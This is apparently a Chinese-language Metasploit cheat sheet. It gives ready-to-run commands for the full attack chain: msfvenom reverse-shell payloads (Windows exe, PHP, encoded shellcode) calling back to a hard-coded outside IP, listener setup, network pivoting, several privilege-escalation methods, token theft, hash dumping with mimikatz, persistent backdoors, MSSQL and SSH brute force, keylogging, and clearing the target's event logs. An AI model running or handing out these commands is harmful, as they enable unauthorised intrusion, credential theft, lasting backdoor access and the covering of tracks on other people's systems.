-
payload的幾個常用生成
-
生成windows下的反彈木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe
// -p < payload > -f < format> -o < path> = > -
監聽
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.17.150.246 //阿里雲雲服務器這里是內網ip
set LPORT 8888
exploit -j -
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php
use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST 172.17.150.246
set LPORT 8888
exploit -j -
shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py //-e 使用編碼 -i 編碼次數
-
內網代理
- 首先需要鏈接sessions,在此基礎下添加路由
meterpreter > run get_local_subnets //獲取網段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //刪除網段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探測該網段下的存活主機。
meterpreter > background //后台sessions
-
提權
- getsystem
meterpreter > getsystem //直getsystem提權,最常用簡單的辦法
- 使用exp提權
meterpreter > background //先后台運行會話
[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //設置要使用的會話
msf post(ms10_073_kbdlayout) > exploit
注意:如果創建了一個system進程,就可以立馬sessions 1進入會話,然后ps查看進程,使用migrate pid注入到進程。
或者直接:
meterpreter > run post/windows/escalate/ms10_073_kbdlayout
3.盜取令牌
meterpreter > use incognito //進入這個模塊
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,兩個斜杠注:只有具有“模仿安全令牌權限”的賬戶才能去模仿別人的令牌,一般大多數的服務型賬戶(IIS、MSSQL等)有這個權限,大多數用戶級的賬戶沒有這個權限。一般從web拿到的webshell都是IIS服務器權限,是具有這個模仿權限的,建好的賬戶沒有這個權限。使用菜刀(IIS服務器權限)反彈meterpreter是服務型權限。
4.Bypassuac
msf > use exploit/windows/local/bypassuac //32位與64位一樣,其他幾個模塊也一樣
msf > show options
msf > set session 4
msf > run //成功后會返回一個新的session,進入新會話,發現權限沒變,使用getsystem即可完成提權
5.Hash
meterpreter > run post/windows/gather/smart_hashdump //讀取hash這種做法最智能,效果最好。
-
建立持久后門
-
服務啟動后門:
meterpreter > run metsvc -A //再開起一個終端,進入msfconsole
msf > use exploit/multi/handler //新終端中監聽
msf > set payload windows/metsvc_bind_tcp
msf > set LPORT 31337
msf > set RHOST 192.168.0.128
msf > run //獲取到的會話是system權限 -
啟動項啟動后門
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
// -X 系統開機自啟,-i 10 10秒重連一次,-p 監聽端口,-r 監聽機。直接監聽就好了,他自己會鏈接回來。
注意到移除 persistence 后門的辦法是刪除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注冊表鍵和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。
缺點:容易被殺毒軟件殺 。
這兩個后門有個弊端,在進程中都會存在服務名稱為meterpreter的進程。
-
漏洞掃描
-
對端口都掃描
use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
exploit -
mssql開發利用
- 對各個ip是否有mssql服務的探測
use scanner/mssql/mssql_ping //測試MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit - 對掃描到的ip進行爆破
use scanner/mssql/mssql_login //具體配置show options。 - sa權限對其利用
use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set CMD cmd.exe /c echo hello
exploit
- 對各個ip是否有mssql服務的探測
-
mysql開放利用
- 爆破ssh模塊:
use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file /root/pass.txt //加載字典,可以收集密碼做字典
set threads 50
run - 通過nmap掃描基本漏洞:
msf > nmap –script=vuln 受害靶機ip地址
msf > nmap –script=mysql-info 192.168.0.4 //掃描mysql數據庫信息 版本 等..
最后清除記錄
msf > clearev //刪除目標機上的應用程序、系統和安全日志。
一些常用命令
查看系統命令 sysinfo
截圖 screenshot
查看是否是虛擬機 run checkvm
查看運行木馬的用戶 getuid
注入到進程 migrate pid //成功會提示successfully
加載mimikatz模塊 meterpreter > load mimikatz meterpreter > wdigest //需要system權限
獲取鍵盤記錄:meterpreter> run post/windows/capture/keylog_recorder #運行鍵盤記錄模塊,他自己創建本文。